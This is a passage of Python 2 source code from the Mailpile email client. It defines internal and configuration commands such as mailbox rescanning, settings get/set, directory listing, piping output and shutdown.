mailpile.util.LAST_USER_ACTIVITY = 0
if args and args[0].lower().startswith('vcards'):
return self._success(_('Rescanned vcards'),
result=self._rescan_vcards(session, args[0]))
elif args and args[0].lower() in ('both', 'mailboxes', 'sources',
'editable'):
which = args[0].lower()
return self._success(_('Rescanned mailboxes'),
result=self._rescan_mailboxes(session,
which=which))
elif args and args[0].lower() == 'full':
config.flush_mbox_cache(session, wait=True)
args.pop(0)
# Clear the cache first, in case the user is flailing about
ClearParseCache(full=True)
msg_idxs = self._choose_messages(args)
if msg_idxs:
for msg_idx_pos in msg_idxs:
e = Email(idx, msg_idx_pos)
try:
session.ui.mark('Re-indexing %s' % e.msg_mid())
idx.index_email(self.session, e)
except KeyboardInterrupt:
raise
except:
self._ignore_exception()
session.ui.warning(_('Failed to reindex: %s'
) % e.msg_mid())
self.event.data["messages"] = len(msg_idxs)
self.session.config.event_log.log_event(self.event)
self._background_save(index=True)
return self._success(_('Indexed %d messages') % len(msg_idxs),
result={'messages': len(msg_idxs)})
else:
# FIXME: Need a lock here?
if 'rescan' in config._running:
return self._success(_('Rescan already in progress'))
config._running['rescan'] = True
try:
results = {}
results.update(self._rescan_vcards(session, 'vcards'))
results.update(self._rescan_mailboxes(session))
self.event.data.update(results)
self.session.config.event_log.log_event(self.event)
if 'aborted' in results:
raise KeyboardInterrupt()
return self._success(_('Rescanned vcards and mailboxes'),
result=results)
except (KeyboardInterrupt), e:
return self._error(_('User aborted'), info=results)
finally:
del config._running['rescan']
def _rescan_vcards(self, session, which):
from mailpile.plugins import PluginManager
config = session.config
imported = 0
importer_cfgs = config.prefs.vcard.importers
which_spec = which.split(':')
importers = []
try:
session.ui.mark(_('Rescanning: %s') % 'vcards')
for importer in PluginManager.VCARD_IMPORTERS.values():
if (len(which_spec) > 1 and
which_spec[1] != importer.SHORT_NAME):
continue
importers.append(importer.SHORT_NAME)
for cfg in importer_cfgs.get(importer.SHORT_NAME, []):
if cfg:
imp = importer(session, cfg)
imported += imp.import_vcards(session, config.vcards)
if mailpile.util.QUITTING:
return {'vcards': imported, 'vcard_sources': importers,
'aborted': True}
except KeyboardInterrupt:
return {'vcards': imported, 'vcard_sources': importers,
'aborted': True}
return {'vcards': imported, 'vcard_sources': importers}
def _run_rescan_command(self, session, timeout=120):
pre_command = session.config.prefs.rescan_command
if pre_command and not mailpile.util.QUITTING:
session.ui.mark(_('Running: %s') % pre_command)
if not ('|' in pre_command or
'&' in pre_command or
';' in pre_command):
pre_command = pre_command.split()
cmd = subprocess.Popen(pre_command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=not isinstance(pre_command, list))
countdown = [timeout]
def eat(fmt, fd):
for line in fd:
session.ui.notify(fmt % line.strip())
countdown[0] = timeout
for t in [
threading.Thread(target=eat, args=['E: %s', cmd.stderr]),
threading.Thread(target=eat, args=['O: %s', cmd.stdout])
]:
t.daemon = True
t.start()
try:
while countdown[0] > 0:
countdown[0] -= 1
if cmd.poll() is not None:
rv = cmd.wait()
if rv != 0:
session.ui.notify(_('Rescan command returned %d')
% rv)
return
elif mailpile.util.QUITTING:
return
time.sleep(1)
finally:
if cmd.poll() is None:
session.ui.notify(_('Aborting rescan command'))
cmd.terminate()
time.sleep(0.2)
if cmd.poll() is None:
cmd.kill()
# NOTE: For some reason we were using the un-safe Popen before, not sure
# if that matters. Leaving this commented out for now for reference.
#
# try:
# MakePopenUnsafe()
# subprocess.check_call(pre_command, shell=True)
# finally:
# MakePopenSafe()
def _rescan_mailboxes(self, session, which='mailboxes'):
import mailpile.mail_source
config = session.config
idx = self._idx()
msg_count = 0
mbox_count = 0
rv = True
try:
session.ui.mark(_('Rescanning: %s') % which)
self._run_rescan_command(session)
msg_count = 1
if which in ('both', 'mailboxes', 'editable'):
if which == 'editable':
mailboxes = config.get_mailboxes(mail_sources=True)
else:
mailboxes = config.get_mailboxes(mail_sources=False)
for fid, fpath, sc in mailboxes:
if mailpile.util.QUITTING:
break
if fpath == '/dev/null':
continue
try:
session.ui.mark(_('Rescanning: %s %s')
% (fid, fpath))
if which == 'editable':
count = idx.scan_mailbox(session, fid, fpath,
config.open_mailbox,
process_new=False,
editable=True,
event=self.event)
else:
count = idx.scan_mailbox(session, fid, fpath,
config.open_mailbox,
event=self.event)
except ValueError:
self._ignore_exception()
count = -1
if count < 0:
session.ui.warning(_('Failed to rescan: %s') % fpath)
elif count > 0:
msg_count += count
mbox_count += 1
session.ui.mark('\n')
if which in ('both', 'sources'):
ocount = msg_count - 1
while ocount != msg_count:
ocount = msg_count
sources = config.mail_sources.values()
sources.sort(key=lambda k: random.randint(0, 100))
for src in sources:
if mailpile.util.QUITTING:
ocount = msg_count
break
session.ui.mark(_('Rescanning: %s') % (src, ))
count = src.rescan_now(session)
if count > 0:
msg_count += count
mbox_count += 1
session.ui.mark('\n')
if not session.ui.interactive:
break
msg_count -= 1
session.ui.mark(_('Nothing changed'))
except (KeyboardInterrupt, subprocess.CalledProcessError), e:
return {'aborted': True,
'messages': msg_count,
'mailboxes': mbox_count}
finally:
if msg_count:
session.ui.mark('\n')
if msg_count < 500:
self._background_save(index=True)
else:
self._background_save(index_full=True)
return {'messages': msg_count,
'mailboxes': mbox_count}
class Optimize(Command):
"""Optimize the keyword search index"""
SYNOPSIS = (None, 'optimize', None, '[harder]')
ORDER = ('Internals', 3)
def command(self, slowly=False):
try:
if not slowly:
mailpile.util.LAST_USER_ACTIVITY = 0
self._idx().save(self.session)
GlobalPostingList.Optimize(self.session, self._idx(),
force=('harder' in self.args))
return self._success(_('Optimized search engine'))
except KeyboardInterrupt:
return self._error(_('Aborted'))
class BrowseOrLaunch(Command):
"""Launch browser and exit, if already running"""
SYNOPSIS = (None, 'browse_or_launch', None, None)
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
RAISES = (KeyboardInterrupt,)
@classmethod
def Browse(cls, sspec):
http_url = ('http://%s:%s/' % sspec
).replace('/0.0.0.0:', '/localhost:')
try:
MakePopenUnsafe()
webbrowser.open(http_url)
return http_url
finally:
MakePopenSafe()
return False
def command(self):
config = self.session.config
if config.http_worker:
sspec = config.http_worker.sspec
else:
sspec = (config.sys.http_host, config.sys.http_port)
try:
socket.create_connection(sspec)
self.Browse(sspec)
os._exit(1)
except IOError:
pass
return self._success(_('Launching Mailpile'), result=True)
class RunWWW(Command):
"""Just run the web server"""
SYNOPSIS = (None, 'www', None, '[<host:port>]')
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
def command(self):
config = self.session.config
ospec = (config.sys.http_host, config.sys.http_port)
if self.args:
sspec = self.args[0].split(':', 1)
sspec[1] = int(sspec[1])
else:
sspec = ospec
if self.session.config.http_worker:
self.session.config.http_worker.quit(join=True)
self.session.config.http_worker = None
self.session.config.prepare_workers(self.session,
httpd_spec=tuple(sspec),
daemons=True)
if config.http_worker:
sspec = config.http_worker.httpd.sspec
http_url = 'http://%s:%s/' % sspec
if sspec != ospec:
(config.sys.http_host, config.sys.http_port) = ospec
self._background_save(config=True)
return self._success(_('Moved the web server to %s'
) % http_url)
else:
return self._success(_('Started the web server on %s'
) % http_url)
else:
            return self._error(_('Failed to start the web server'))
class WritePID(Command):
"""Write the PID to a file"""
SYNOPSIS = (None, 'pidfile', None, "</path/to/pidfile>")
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
SPLIT_ARG = False
def command(self):
with open(self.args[0], 'w') as fd:
fd.write('%d' % os.getpid())
return self._success(_('Wrote PID to %s') % self.args)
class RenderPage(Command):
"""Does nothing, for use by semi-static jinja2 pages"""
SYNOPSIS = (None, None, 'page', None)
ORDER = ('Internals', 6)
CONFIG_REQUIRED = False
SPLIT_ARG = False
HTTP_STRICT_VARS = False
IS_USER_ACTIVITY = True
class CommandResult(Command.CommandResult):
def __init__(self, *args, **kwargs):
Command.CommandResult.__init__(self, *args, **kwargs)
if self.result and 'path' in self.result:
self.template_id = 'page/' + self.result['path'] + '/index'
def command(self):
return self._success(_('Rendered the page'), result={
'path': (self.args and self.args[0] or ''),
'data': self.data
})
class ProgramStatus(Command):
"""Display list of running threads, locks and outstanding events."""
SYNOPSIS = (None, 'ps', 'ps', None)
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = False
LOG_NOTHING = True
class CommandResult(Command.CommandResult):
def as_text(self):
now = time.time()
sessions = self.result.get('sessions')
if sessions:
sessions = '\n'.join(sorted([' %s/%s = %s (%ds)'
% (us['sessionid'],
us['userdata'],
us['userinfo'],
now - us['timestamp'])
for us in sessions]))
else:
sessions = ' ' + _('Nothing Found')
ievents = self.result.get('ievents')
cevents = self.result.get('cevents')
if cevents:
cevents = '\n'.join([' %s' % (e.as_text(compact=True),)
for e in cevents])
else:
cevents = ' ' + _('Nothing Found')
ievents = self.result.get('ievents')
if ievents:
ievents = '\n'.join([' %s' % (e.as_text(compact=True),)
for e in ievents])
else:
ievents = ' ' + _('Nothing Found')
threads = self.result.get('threads')
if threads:
threads = '\n'.join(sorted([(' ' + str(t)) for t in threads]))
else:
threads = _('Nothing Found')
locks = self.result.get('locks')
if locks:
locks = '\n'.join(sorted([(' %s.%s is %slocked'
) % (l[0], l[1],
'' if l[2] else 'un')
for l in locks]))
else:
locks = _('Nothing Found')
return ('Recent events:\n%s\n\n'
'Events in progress:\n%s\n\n'
'Live sessions:\n%s\n\n'
'Postinglist timers:\n%s\n\n'
'Threads: (bg delay %.3fs, live=%s, httpd=%s)\n%s\n\n'
'Locks:\n%s'
) % (cevents, ievents, sessions,
self.result['pl_timers'],
self.result['delay'],
self.result['live'],
self.result['httpd'],
threads, locks)
def command(self, args=None):
import mailpile.auth
import mailpile.mail_source
import mailpile.plugins.compose
import mailpile.plugins.contacts
config = self.session.config
try:
idx = config.index
locks = [
('config.index', '_lock', idx._lock._is_owned()),
('config.index', '_save_lock', idx._save_lock._is_owned())
]
except AttributeError:
locks = []
if config.vcards:
locks.extend([
('config.vcards', '_lock', config.vcards._lock._is_owned()),
])
locks.extend([
('config', '_lock', config._lock._is_owned()),
('mailpile.postinglist', 'GLOBAL_POSTING_LOCK',
mailpile.postinglist.GLOBAL_POSTING_LOCK._is_owned()),
            ('mailpile.postinglist', 'GLOBAL_OPTIMIZE_LOCK',
             mailpile.postinglist.GLOBAL_OPTIMIZE_LOCK.locked()),
            ('mailpile.plugins.compose', 'GLOBAL_EDITING_LOCK',
             mailpile.plugins.compose.GLOBAL_EDITING_LOCK._is_owned()),
            ('mailpile.plugins.contacts', 'GLOBAL_VCARD_LOCK',
             mailpile.plugins.contacts.GLOBAL_VCARD_LOCK._is_owned()),
('mailpile.postinglist', 'GLOBAL_GPL_LOCK',
mailpile.postinglist.GLOBAL_GPL_LOCK._is_owned()),
])
threads = threading.enumerate()
for thread in threads:
try:
if hasattr(thread, 'lock'):
locks.append([thread, 'lock', thread.lock])
if hasattr(thread, '_lock'):
locks.append([thread, '_lock', thread._lock])
if locks and hasattr(locks[-1][-1], 'locked'):
locks[-1][-1] = locks[-1][-1].locked()
elif locks and hasattr(locks[-1][-1], '_is_owned'):
locks[-1][-1] = locks[-1][-1]._is_owned()
except AttributeError:
pass
import mailpile.auth
import mailpile.httpd
result = {
'sessions': [{'sessionid': k,
'timestamp': v.ts,
'userdata': v.data,
'userinfo': v.auth} for k, v in
mailpile.auth.SESSION_CACHE.iteritems()],
'pl_timers': mailpile.postinglist.TIMERS,
'delay': play_nice_with_threads(sleep=False),
'live': mailpile.util.LIVE_USER_ACTIVITIES,
'httpd': mailpile.httpd.LIVE_HTTP_REQUESTS,
'threads': threads,
'locks': sorted(locks)
}
if config.event_log:
result.update({
'cevents': list(config.event_log.events(flag='c'))[-10:],
'ievents': config.event_log.incomplete(),
})
return self._success(_("Listed events, threads, and locks"),
result=result)
class GpgCommand(Command):
"""Interact with GPG directly"""
SYNOPSIS = (None, 'gpg', None, "<GPG arguments ...>")
ORDER = ('Internals', 4)
IS_USER_ACTIVITY = True
def command(self, args=None):
args = list((args is None) and self.args or args or [])
# FIXME: For this to work anywhere but in a terminal, we'll need
# to somehow pipe input to/from GPG in a more sane way.
from mailpile.crypto.gpgi import GPG_BINARY
with self.session.ui.term:
try:
self.session.ui.block()
os.system(' '.join([GPG_BINARY] + args))
except:
self.session.ui.unblock()
return self._success(_("That was fun!"))
class ListDir(Command):
"""Display working directory listing"""
SYNOPSIS = (None, 'ls', None, "<.../new/path/...>")
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
class CommandResult(Command.CommandResult):
def as_text(self):
if self.result:
lines = []
for fn, sz, isdir in self.result:
lines.append(('%10.10s %s%s'
) % (sz, fn, isdir and '/' or ''))
return '\n'.join(lines)
else:
return _('Nothing Found')
def command(self, args=None):
args = list((args is None) and self.args or args or [])
if self.session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
try:
file_list = [(f.decode('utf-8'),
os.path.getsize(f),
os.path.isdir(f))
for f in os.listdir('.') if not f.startswith('.')
and not args or [a for a in args if a in f]]
file_list.sort(key=lambda i: i[0].lower())
return self._success(_('Current directory is %s') % os.getcwd(),
result=file_list)
except (OSError, IOError, UnicodeDecodeError), e:
return self._error(_('Failed to list directory: %s') % e)
class ChangeDir(ListDir):
"""Change working directory"""
SYNOPSIS = (None, 'cd', None, "<.../new/path/...>")
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
def command(self, args=None):
args = list((args is None) and self.args or args or [])
if self.session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
try:
os.chdir(args.pop(0).encode('utf-8'))
return ListDir.command(self, args=args)
except (OSError, IOError, UnicodeEncodeError), e:
return self._error(_('Failed to change directories: %s') % e)
class CatFile(Command):
"""Dump the contents of a file, decrypting if necessary"""
SYNOPSIS = (None, 'cat', None, "</path/to/file> [>/path/to/output]")
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
class CommandResult(Command.CommandResult):
def as_text(self):
if isinstance(self.result, list):
return ''.join(self.result)
else:
return ''
def command(self, args=None):
lines = []
files = list(args or self.args)
if self.session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
target = tfd = None
if files and files[-1] and files[-1][:1] == '>':
target = files.pop(-1)[1:]
if os.path.exists(target):
return self._error(_('That file already exists: %s'
) % target)
tfd = open(target, 'wb')
cb = lambda ll: [tfd.write(l) for l in ll]
else:
cb = lambda ll: lines.extend((l.decode('utf-8') for l in ll))
for fn in files:
with open(fn, 'r') as fd:
decrypt_and_parse_lines(fd, cb, self.session.config,
newlines=True, decode=None)
if tfd:
tfd.close()
return self._success(_('Dumped to %s: %s'
) % (target, ', '.join(files)))
else:
return self._success(_('Dumped: %s') % ', '.join(files),
result=lines)
##[ Configuration commands ]###################################################
class ConfigSet(Command):
"""Change a setting"""
SYNOPSIS = ('S', 'set', 'settings/set', '<section.variable> <value>')
ORDER = ('Config', 1)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = False
SPLIT_ARG = False
HTTP_CALLABLE = ('POST', 'UPDATE')
HTTP_STRICT_VARS = False
HTTP_POST_VARS = {
'_section': 'common section, create if needed',
'section.variable': 'value|json-string'
}
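    # Usage example (illustrative): on the CLI both `set prefs.num_results 50`
    # and the older `set prefs.num_results = 50` forms are accepted; over HTTP
    # the setting name itself is used as the POST variable name.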
def command(self):
from mailpile.httpd import BLOCK_HTTPD_LOCK, Idle_HTTPD
config = self.session.config
args = list(self.args)
ops = []
if config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
if not config.loaded_config:
self.session.ui.warning(_('WARNING: Any changes will '
'be overwritten on login'))
section = self.data.get('_section', [''])[0]
if section:
# Make sure section exists
ops.append((section, '!CREATE_SECTION'))
for var in self.data.keys():
if var in ('_section', '_method'):
continue
sep = '/' if ('/' in (section+var)) else '.'
svar = (section+sep+var) if section else var
parts = svar.split(sep)
if parts[0] in config.rules:
if svar.endswith('[]'):
ops.append((svar[:-2], json.dumps(self.data[var])))
else:
ops.append((svar, self.data[var][0]))
else:
raise ValueError(_('Invalid section or variable: %s') % var)
if self.args:
arg = ' '.join(self.args)
if '=' in arg:
                # Backwards compatibility with the old 'var = value' syntax.
var, value = [s.strip() for s in arg.split('=', 1)]
var = var.replace(': ', '.').replace(':', '.').replace(' ', '')
else:
var, value = arg.split(' ', 1)
ops.append((var, value))
# We don't have transactions really, but making sure the HTTPD
# is idle (aside from this request) will definitely help.
with BLOCK_HTTPD_LOCK, Idle_HTTPD():
updated = {}
for path, value in ops:
value = value.strip()
if value[:1] in ('{', '[') and value[-1:] in ( ']', '}'):
value = json.loads(value)
try:
try:
cfg, var = config.walk(path.strip(), parent=1)
if value == '!CREATE_SECTION':
if var not in cfg:
cfg[var] = {}
else:
cfg[var] = value
updated[path] = value
except IndexError:
cfg, v1, v2 = config.walk(path.strip(), parent=2)
cfg[v1] = {v2: value}
except TypeError:
raise ValueError('Could not set variable: %s' % path)
if config.loaded_config:
self._background_save(config=True)
return self._success(_('Updated your settings'), result=updated)
class ConfigAdd(Command):
"""Add a new value to a list (or ordered dict) setting"""
SYNOPSIS = (None, 'append', 'settings/add', '<section.variable> <value>')
ORDER = ('Config', 1)
SPLIT_ARG = False
HTTP_CALLABLE = ('POST', 'UPDATE')
HTTP_STRICT_VARS = False
HTTP_POST_VARS = {
'section.variable': 'value|json-string',
}
IS_USER_ACTIVITY = True
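    # Usage example (illustrative): `append sys.mailbox /path/to/mbox` appends
    # a value to a list-valued setting (the path is just a placeholder).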
def command(self):
from mailpile.httpd import BLOCK_HTTPD_LOCK, Idle_HTTPD
config = self.session.config
ops = []
if config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
for var in self.data.keys():
parts = ('.' in var) and var.split('.') or var.split('/')
if parts[0] in config.rules:
ops.append((var, self.data[var][0]))
if self.args:
arg = ' '.join(self.args)
if '=' in arg:
# Backwards compatible with the old 'var = value' syntax.
var, value = [s.strip() for s in arg.split('=', 1)]
var = var.replace(': ', '.').replace(':', '.').replace(' ', '')
else:
var, value = arg.split(' ', 1)
ops.append((var, value))
# We don't have transactions really, but making sure the HTTPD
# is idle (aside from this request) will definitely help.
with BLOCK_HTTPD_LOCK, Idle_HTTPD():
updated = {}
for path, value in ops:
value = value.strip()
if value.startswith('{') or value.startswith('['):
value = json.loads(value)
cfg, var = config.walk(path.strip(), parent=1)
cfg[var].append(value)
updated[path] = value
if updated:
self._background_save(config=True)
return self._success(_('Updated your settings'), result=updated)
class ConfigUnset(Command):
"""Reset one or more settings to their defaults"""
SYNOPSIS = ('U', 'unset', 'settings/unset', '<var>')
ORDER = ('Config', 2)
HTTP_CALLABLE = ('POST', )
HTTP_POST_VARS = {
'var': 'section.variables'
}
IS_USER_ACTIVITY = True
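    # Usage example (illustrative): `unset prefs.rescan_command` resets a
    # single value to its default; dict- and list-valued settings are emptied
    # instead (see the nested unset() helper below).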
def command(self):
from mailpile.httpd import BLOCK_HTTPD_LOCK, Idle_HTTPD
session, config = self.session, self.session.config
if config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
def unset(cfg, key):
if isinstance(cfg[key], dict):
if '_any' in cfg[key].rules:
for skey in cfg[key].keys():
del cfg[key][skey]
else:
for skey in cfg[key].keys():
unset(cfg[key], skey)
elif isinstance(cfg[key], list):
cfg[key] = []
else:
del cfg[key]
# We don't have transactions really, but making sure the HTTPD
# is idle (aside from this request) will definitely help.
with BLOCK_HTTPD_LOCK, Idle_HTTPD():
updated = []
vlist = list(self.args) + (self.data.get('var', None) or [])
for v in vlist:
                cfg, vn = config.walk(v, parent=True)
                unset(cfg, vn)
                updated.append(v)
if updated:
self._background_save(config=True)
return self._success(_('Reset to default values'), result=updated)
class ConfigPrint(Command):
"""Print one or more settings"""
SYNOPSIS = ('P', 'print', 'settings', '[-short|-secrets|-flat] <var>')
ORDER = ('Config', 3)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = False
HTTP_CALLABLE = ('GET', 'POST')
HTTP_QUERY_VARS = {
'var': 'section.variable',
'short': 'Set True to omit unchanged values (defaults)',
'secrets': 'Set True to show passwords and other secrets'
}
HTTP_POST_VARS = {
'user': 'Authenticate as user',
'pass': 'Authenticate with password'
}
def _maybe_all(self, list_all, data, key_types, recurse, sanitize):
if isinstance(data, (dict, list)) and list_all:
rv = {}
for key in data.all_keys():
if [t for t in data.key_types(key) if t not in key_types]:
# Silently omit things that are considered sensitive
continue
rv[key] = data[key]
if hasattr(rv[key], 'all_keys'):
if recurse:
rv[key] = self._maybe_all(True, rv[key], key_types,
recurse, sanitize)
else:
if 'name' in rv[key]:
rv[key] = '{ ..(%s).. }' % rv[key]['name']
elif 'description' in rv[key]:
rv[key] = '{ ..(%s).. }' % rv[key]['description']
elif 'host' in rv[key]:
rv[key] = '{ ..(%s).. }' % rv[key]['host']
else:
rv[key] = '{ ... }'
elif sanitize and key.lower()[:4] in ('pass', 'secr'):
rv[key] = '(SUPPRESSED)'
return rv
return data
def command(self):
session, config = self.session, self.session.config
result = {}
invalid = []
args = list(self.args)
recurse = not self.data.get('flat', ['-flat' in args])[0]
list_all = not self.data.get('short', ['-short' in args])[0]
sanitize = not self.data.get('secrets', ['-secrets' in args])[0]
# FIXME: Shouldn't we suppress critical variables as well?
key_types = ['public', 'critical']
access_denied = False
if self.data.get('_method') == 'POST':
if 'pass' in self.data:
from mailpile.auth import CheckPassword
password = self.data['pass'][0]
auth_user = CheckPassword(config,
self.data.get('user', [None])[0],
password)
if auth_user == 'DEFAULT':
key_types += ['key']
result['_auth_user'] = auth_user
result['_auth_pass'] = password
for key in (args + self.data.get('var', [])):
if key in ('-short', '-flat', '-secrets'):
continue
try:
data = config.walk(key, key_types=key_types)
result[key] = self._maybe_all(list_all, data, key_types,
recurse, sanitize)
except AccessError:
access_denied = True
invalid.append(key)
except KeyError:
invalid.append(key)
if invalid:
return self._error(_('Invalid keys'),
result=result, info={
'keys': invalid,
'key_types': key_types,
'access_denied': access_denied
})
else:
return self._success(_('Displayed settings'), result=result)
class AddMailboxes(Command):
"""Add one or more mailboxes"""
SYNOPSIS = ('A', 'add', None, '<path/to/mailbox>')
ORDER = ('Config', 4)
SPLIT_ARG = False
HTTP_CALLABLE = ('POST', 'UPDATE')
IS_USER_ACTIVITY = True
MAX_PATHS = 50000
def command(self):
from mailpile.httpd import BLOCK_HTTPD_LOCK, Idle_HTTPD
session, config = self.session, self.session.config
adding = []
existing = config.sys.mailbox
paths = list(self.args)
if config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
try:
while paths:
raw_fn = paths.pop(0)
fn = os.path.normpath(os.path.expanduser(raw_fn))
fn = os.path.abspath(fn)
if raw_fn in existing or fn in existing:
session.ui.warning('Already in the pile: %s' % raw_fn)
elif raw_fn.startswith("imap://"):
adding.append(raw_fn)
elif IsMailbox(fn, config):
adding.append(raw_fn)
elif os.path.exists(fn) and os.path.isdir(fn):
session.ui.mark('Scanning %s for mailboxes' % fn)
try:
for f in [f for f in os.listdir(fn)
if not f.startswith('.')]:
paths.append(os.path.join(fn, f))
if len(paths) > self.MAX_PATHS:
return self._error(_('Too many files'))
except OSError:
if raw_fn in self.args:
return self._error(_('Failed to read: %s'
) % raw_fn)
elif raw_fn in self.args:
return self._error(_('No such file or directory: %s'
) % raw_fn)
except KeyboardInterrupt:
return self._error(_('User aborted'))
added = {}
# We don't have transactions really, but making sure the HTTPD
# is idle (aside from this request) will definitely help.
with BLOCK_HTTPD_LOCK, Idle_HTTPD():
for arg in adding:
added[config.sys.mailbox.append(arg)] = arg
if added:
self._background_save(config=True)
return self._success(_('Added %d mailboxes') % len(added),
result={'added': added})
else:
return self._success(_('Nothing was added'))
###############################################################################
class Cached(Command):
"""Fetch results from the command cache."""
SYNOPSIS = (None, 'cached', 'cached', '[<cache-id>]')
ORDER = ('Internals', 7)
HTTP_QUERY_VARS = {'id': 'Cache ID of command to redisplay'}
IS_USER_ACTIVITY = False
LOG_NOTHING = True
def run(self):
try:
cid = self.args[0] if self.args else self.data.get('id', [None])[0]
rv = self.session.config.command_cache.get_result(cid)
self.session.copy(rv.session)
rv.session.ui.render_mode = self.session.ui.render_mode
return rv
except:
self._starting()
self._ignore_exception()
self._error(self.FAILURE % {'name': self.name,
'args': ' '.join(self.args)})
return self._finishing(False)
class Output(Command):
"""Choose format for command results."""
SYNOPSIS = (None, 'output', None, '[json|text|html|<template>.html|...]')
ORDER = ('Internals', 7)
CONFIG_REQUIRED = False
HTTP_STRICT_VARS = False
HTTP_AUTH_REQUIRED = False
IS_USER_ACTIVITY = False
LOG_NOTHING = True
def etag_data(self):
return self.get_render_mode()
def max_age(self):
return 364 * 24 * 3600 # A long time!
def get_render_mode(self):
return self.args and self.args[0] or self.session.ui.render_mode
def command(self):
m = self.session.ui.render_mode = self.get_render_mode()
return self._success(_('Set output mode to: %s') % m,
result={'output': m})
class Pipe(Command):
"""Pipe a command to a shell command, file or e-mail"""
SYNOPSIS = (None, 'pipe', None,
"[e@mail.com|command|>filename] -- [<cmd> [args ... ]]")
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
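    # Usage example (illustrative): `pipe >results.txt -- search in:inbox`
    # captures the rendered output of `search in:inbox` and writes it to
    # results.txt; an e-mail address as the target mails the output instead.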
def command(self):
if '--' in self.args:
dashdash = self.args.index('--')
target = self.args[0:dashdash]
command, args = self.args[dashdash+1], self.args[dashdash+2:]
else:
target, command, args = [self.args[0]], self.args[1], self.args[2:]
output = ''
result = None
old_ui = self.session.ui
try:
from mailpile.ui import CapturingUserInteraction as CUI
self.session.ui = capture = CUI(self.session.config)
capture.render_mode = old_ui.render_mode
result = Action(self.session, command, ' '.join(args))
capture.display_result(result)
output = capture.captured
finally:
self.session.ui = old_ui
if target[0].startswith('>'):
t = ' '.join(target)
if t[0] == '>':
t = t[1:]
with open(t.strip(), 'w') as fd:
fd.write(output.encode('utf-8'))
elif '@' in target[0]:
from mailpile.plugins.compose import Compose
body = 'Result as %s:\n%s' % (capture.render_mode, output)
if capture.render_mode != 'json' and output[0] not in ('{', '['):
body += '\n\nResult as JSON:\n%s' % result.as_json()
composer = Compose(self.session, data={
'to': target,
'subject': ['Mailpile: %s %s' % (command, ' '.join(args))],
'body': [body]
})
return self._success('Mailing output to %s' % ', '.join(target),
result=composer.run())
else:
try:
self.session.ui.block()
MakePopenUnsafe()
kid = subprocess.Popen(target, shell=True, stdin=PIPE)
rv = kid.communicate(input=output.encode('utf-8'))
finally:
self.session.ui.unblock()
MakePopenSafe()
kid.wait()
if kid.returncode != 0:
return self._error('Error piping to %s' % (target, ),
info={'stderr': rv[1], 'stdout': rv[0]})
return self._success('Wrote %d bytes to %s'
% (len(output), ' '.join(target)))
class Quit(Command):
"""Exit Mailpile, normal shutdown"""
SYNOPSIS = ("q", "quit", "quitquitquit", None)
ABOUT = ("Quit mailpile")
ORDER = ("Internals", 2)
CONFIG_REQUIRED = False
RAISES = (KeyboardInterrupt,)
def command(self):
if self.session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
mailpile.util.QUITTING = True
self._background_save(index=True, config=True, wait=True)
try:
import signal
os.kill(mailpile.util.MAIN_PID, signal.SIGINT)
except:
def exiter():
time.sleep(1)
os._exit(0)
threading.Thread(target=exiter).start()
return self._success(_('Shutting down...'))
class TrustingQQQ(Command):
"""Allow anybody to quit the app"""
SYNOPSIS = (None, "trustingqqq", None, None)
def command(self):
# FIXME: This is a hack to allow Windows deployments to shut
# down cleanly. Eventually this will take an argument
# specifying a random token that the launcher chooses.
Quit.HTTP_AUTH_REQUIRED = False
return self._success('OK, anybody can quit!')
class Abort(Command):
"""Force exit Mailpile (kills threads)"""
SYNOPSIS = (None, "quit/abort", "abortabortabort", None)
ABOUT = ("Quit mailpile")
ORDER = ("Internals", 2)
CONFIG_REQUIRED = False
HTTP_QUERY_VARS = {
'no_save': 'Do not try to save state'
}
def command(self):
if self.session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
mailpile.util.QUITTING = True
if 'no_save' not in self.data:
self._background_save(index=True, config=True, wait=True,
wait_callback=lambda: os._exit(1))
else:
os._exit(1)
return self._success(_('Shutting down...'))
class Help(Command):
"""Print help on Mailpile or individual commands."""
SYNOPSIS = ('h', 'help', 'help', '[<command-group>]')
ABOUT = ('This is Mailpile!')
ORDER = ('Config', 9)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
class CommandResult(Command.CommandResult):
def splash_as_text(self):
text = [
self.result['splash']
]
if self.result['http_url']:
text.append(_('The Web interface address is: %s'
) % self.result['http_url'])
else:
text.append(_('The Web interface is disabled,'
' type `www` to turn it on.'))
text.append('')
b = ' * '
if self.result['interactive']:
text.append(b + _('Type `help` for instructions or `quit` '
'to quit.'))
text.append(b + _('Long running operations can be aborted '
'by pressing: <CTRL-C>'))
if self.result['login_cmd'] and self.result['interactive']:
text.append(b + _('You can log in using the `%s` command.'
) % self.result['login_cmd'])
if self.result['in_browser']:
text.append(b + _('Check your web browser!'))
return '\n'.join(text)
def variables_as_text(self):
text = []
for group in self.result['variables']:
text.append(group['name'])
for var in group['variables']:
sep = ('=' in var['type']) and ': ' or ' = '
text.append((' %-35s %s'
) % (('%s%s<%s>'
) % (var['var'], sep,
var['type'].replace('=', '> = <')),
var['desc']))
text.append('')
return '\n'.join(text)
def commands_as_text(self):
text = [_('Commands:')]
last_rank = None
cmds = self.result['commands']
width = self.result.get('width', 8)
ckeys = cmds.keys()
ckeys.sort(key=lambda k: (cmds[k][3], cmds[k][0]))
arg_width = min(50, max(14, self.session.ui.term.max_width()-70))
for c in ckeys:
cmd, args, explanation, rank = cmds[c]
if not rank or not cmd:
continue
